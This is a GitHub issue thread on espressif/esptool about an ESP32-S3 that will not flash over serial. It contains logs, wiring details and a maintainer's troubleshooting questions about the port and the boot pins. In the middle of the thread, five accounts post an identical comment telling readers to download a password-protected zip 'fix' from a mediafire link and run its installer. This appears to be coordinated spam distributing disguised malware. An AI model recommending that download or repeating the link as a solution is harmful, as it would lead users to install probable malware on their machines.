espressif/esptool #1002: A fatal error occurred: Failed to connect to ESP32-S3: No serial data received.

KeepGoingZouZou, 2024-08-26:
### Operating System

macOS 14.4.1

### Esptool Version

v4.0.1

### Python Version

Python 3.9.6

### Chip Description

ESP32-S3-WROOM-1

### Device Description

ESP32-S3-WROOM-1

### Hardware Configuration

USB-TTL  3.3V/5V  USB-TTL(TX)->ESP32S3(RX)    USB-TTL(RX)->ESP32S3(TX) 
CH340      3.3V/5V CH340L(TX)->ESP32S3(RX)    CH340(RX)->ESP32S3(TX) 

### How is Esptool Run

Arduino

### Esptool Output

```shell
Sketch uses 298993 bytes (22%) of program storage space. Maximum is 1310720 bytes.
Global variables use 16232 bytes (4%) of dynamic memory, leaving 311448 bytes for local variables. Maximum is 327680 bytes.
"/Users/zouzou/Library/Arduino15/packages/esp32/tools/esptool_py/4.6/esptool" --chip esp32s3 --port "/dev/cu.usbmodem0001A00000001" --baud 115200  --before default_reset --after hard_reset write_flash  -z --flash_mode keep --flash_freq keep --flash_size keep 0x0 "/private/var/folders/hc/8f7lbnqs54bb8nhb0_cw13f80000gp/T/arduino/sketches/6A79E4879AA62DAD3B67D8D6F02D3D51/ArduinoSineFunction.ino.bootloader.bin" 0x8000 "/private/var/folders/hc/8f7lbnqs54bb8nhb0_cw13f80000gp/T/arduino/sketches/6A79E4879AA62DAD3B67D8D6F02D3D51/ArduinoSineFunction.ino.partitions.bin" 0xe000 "/Users/zouzou/Library/Arduino15/packages/esp32/hardware/esp32/3.0.1/tools/partitions/boot_app0.bin" 0x10000 "/private/var/folders/hc/8f7lbnqs54bb8nhb0_cw13f80000gp/T/arduino/sketches/6A79E4879AA62DAD3B67D8D6F02D3D51/ArduinoSineFunction.ino.bin" 
esptool.py v4.6
Serial port /dev/cu.usbmodem0001A00000001
Connecting......................................

A fatal error occurred: Failed to connect to ESP32-S3: No serial data received.
For troubleshooting steps visit: https://docs.espressif.com/projects/esptool/en/latest/troubleshooting.html
Failed uploading: uploading error: exit status 2
```

### More Information

12:58:47.644 -> [0;32mI (478) TinyUSB: TinyUSB Driver installed[0m
12:58:47.644 -> [0;32mI (488) example: USB initialization DONE[0m
12:58:48.535 -> [0;32mI (1388) example: log -> UART[0m
12:58:48.632 -> example: print -> stdout
12:58:48.765 -> example: print -> stderr
12:58:50.055 -> [0;32mI (2888) example: log -> UART[0m
12:58:50.153 -> example: print -> stdout
12:58:50.253 -> example: print -> stderr
12:58:50.556 -> ESP-ROM:esp32s3-20210327
12:58:50.588 -> Build:Mar 27 2021
12:58:50.588 -> rst:0x1 (POWERON),boot:0x0 (DOWNLOAD(USB/UART0))
12:58:50.588 -> waiting for download
I think the serial communication and connection line is normal, because I can read the inflow of data in the serial monitor and I can enter the burn/download mode, but I tried so many ways to burn the program but I cannot!

USB to TTL/CH340
Development Board ESP32 DEV MODULE /ESP32SE DEV MODULE /ESP32S3 DEV MODULE OCTAL(WROOM2)
FLASH MODE DIO/QIO 80MHZ
Power Supply 3.3V /5.5V 
The same data cable and docking station can burn and upload the program normally on the ESP32-CAM development board.
 It's giving me a headache.

### I Have Read the Troubleshooting Guide

- [X] I confirm I have read the troubleshooting guide.

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

QAQ330, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

radimkarnis, 2024-08-28:
Hello @KeepGoingZouZou,

> USB-TTL 3.3V/5V USB-TTL(TX)->ESP32S3(RX) USB-TTL(RX)->ESP32S3(TX)
CH340 3.3V/5V CH340L(TX)->ESP32S3(RX) CH340(RX)->ESP32S3(TX)

Does this mean that USB-TTL 3.3V/5V = CH340 3.3V/5V? I don't understand why you mention two configurations.

1) Are you using the correct serial port? On MacOS, USB-to-Serial bridges usually appear as a `/dev/cu.usbserial` device. Your log shows `/dev/cu.usbmodem` - which usually appears when you connect to the internal USB-Serial/JTAG or USB-OTG peripherals of the ESP. 

2) You mention you `can enter the burn/download mode`, can you really see the `waiting for download` prompt in the serial log? How do you enter the download mode? The bare ESP32-S3 module has no BOOT and RESET buttons - meaning you can't perform a manual reset to bootloader. Also, you do not mention any connection to the boot strapping pins (DTR -> GPIO0, RTS -> EN pin) - meaning an automatic reset cannot be performed as well.

radimkarnis, 2024-09-16:
Closing this for inactivity.

closed 2024-09-16 by radimkarnis